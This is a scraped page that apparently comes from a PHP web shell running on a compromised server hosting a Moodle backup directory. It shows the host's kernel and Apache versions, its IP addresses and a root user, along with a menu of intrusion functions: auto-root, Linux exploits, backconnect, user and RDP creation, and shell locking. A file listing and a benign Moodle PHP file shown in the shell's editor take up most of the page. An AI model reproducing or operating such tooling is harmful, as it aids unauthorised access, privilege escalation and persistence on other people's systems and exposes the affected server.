Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
dml /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxrwxr-x
database_column_info.php
5.26
KB
-rw-rw-r--
mariadb_native_moodle_database...
4.07
KB
-rw-rw-r--
moodle_database.php
109.57
KB
-rw-rw-r--
moodle_recordset.php
2.14
KB
-rw-rw-r--
moodle_temptables.php
5.66
KB
-rw-rw-r--
moodle_transaction.php
3.25
KB
-rw-rw-r--
mysqli_native_moodle_database....
74.86
KB
-rw-rw-r--
mysqli_native_moodle_recordset...
2.4
KB
-rw-rw-r--
mysqli_native_moodle_temptable...
1.25
KB
-rw-rw-r--
oci_native_moodle_database.php
75.83
KB
-rw-rw-r--
oci_native_moodle_package.sql
4.83
KB
-rw-rw-r--
oci_native_moodle_recordset.ph...
2.35
KB
-rw-rw-r--
oci_native_moodle_temptables.p...
2.76
KB
-rw-rw-r--
pdo_moodle_database.php
21.27
KB
-rw-rw-r--
pdo_moodle_recordset.php
2.19
KB
-rw-rw-r--
pgsql_native_moodle_database.p...
55.29
KB
-rw-rw-r--
pgsql_native_moodle_recordset....
5.17
KB
-rw-rw-r--
pgsql_native_moodle_temptables...
1.66
KB
-rw-rw-r--
sqlite3_pdo_moodle_database.ph...
14.76
KB
-rw-rw-r--
sqlsrv_native_moodle_database....
59.97
KB
-rw-rw-r--
sqlsrv_native_moodle_recordset...
3.77
KB
-rw-rw-r--
sqlsrv_native_moodle_temptable...
2.27
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgsql_native_moodle_temptables.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * PGSQL specific temptables store. Needed because temporary tables * are named differently than normal tables. Also used to be able to retrieve * temp table names included in the get_tables() method of the DB. * * @package core_dml * @copyright 2010 onwards Eloy Lafuente (stronk7) {@link http://stronk7.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); require_once(__DIR__.'/moodle_temptables.php'); class pgsql_native_moodle_temptables extends moodle_temptables { /** * Analyze the data in temporary tables to force statistics collection after bulk data loads. * PostgreSQL does not natively support automatic temporary table stats collection, so we do it. * * @return void */ public function update_stats() { $temptables = $this->get_temptables(); foreach ($temptables as $temptablename) { $this->mdb->execute("ANALYZE {".$temptablename."}"); } } }
Close